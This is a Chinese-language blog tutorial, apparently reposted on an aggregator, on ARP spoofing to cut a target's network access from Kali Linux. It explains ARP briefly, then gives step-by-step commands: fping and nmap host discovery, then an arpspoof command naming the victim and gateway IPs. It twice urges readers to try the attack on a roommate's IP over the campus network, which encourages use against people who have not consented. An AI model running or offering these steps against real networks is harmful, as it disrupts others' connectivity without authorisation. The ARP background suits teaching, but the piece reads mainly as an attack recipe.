网络层—简单的arp断网
生活随笔
收集整理的這篇文章主要介紹了
网络层—简单的arp断网
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
一、ARP協議
二、環境準備
大環境:物理機+kali
小工具:namp/fping+arpspoof
三、斷網攻擊原理
四、廢話不多,開干開干
1)物理機查看網段以及被攻擊ip
2)kali選擇網卡 需要ifconfig與物理機在同一網段(注意)
3)kali掃描網段存活主機
4)觀察物理機是否能上網(可以)
5)攻擊命令 eth0是與物理機ip處在同一網段的網卡
6)? 成功斷網
7)恢復網絡? kali ctrl+c? 結束命令
tips:連上校園網? 試試你舍友的ip吧!
一、ARP協議
ARP(Address Resolution Protocol)地址解析協議,目的是實現IP地址到MAC地址的轉換。
在計算機間通信的時候,計算機要知道目的計算機是誰(就像我們人交流一樣,要知道對方是誰),這中間需要涉及到MAC地址,而MAC是真正的電腦的唯一標識符。
為什么需要ARP協議呢?因為在OSI七層模型中,對數據從上到下進行封裝發送出去,然后對數據從下到上解包接收,但是上層(網絡層)關心的IP地址,下層關心的是MAC地址,這個時候就需要映射IP和MAC。
二、環境準備
大環境:物理機+kali
小工具:namp/fping+arpspoof
三、斷網攻擊原理
圖解ARP協議(二)ARP攻擊原理與實踐 - 知乎 (zhihu.com)https://zhuanlan.zhihu.com/p/367998688
四、廢話不多,開干開干
1)物理機查看網段以及被攻擊ip
?2)kali選擇網卡 需要ifconfig與物理機在同一網段(注意)
3)kali掃描網段存活主機
fping命令
fping -g 192.168.1.0/24?nmap命令(掃描不到物理機,因為是宿主機)
nmap -sP 192.168.1.0/24推薦此實驗使用,fping
4)觀察物理機是否能上網(可以)
?5)攻擊命令 eth0是與物理機ip處在同一網段的網卡
sudo arpspoof -i eth0 -t 物理機ip 網關ip6)成功斷網
?
?7)恢復網絡? kali ctrl+c? 結束命令
tips:連上校園網? 試試你舍友的ip吧!
總結
以上是生活随笔為你收集整理的网络层—简单的arp断网的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python 破解字体反爬 (二)
- 下一篇: boost1.79编译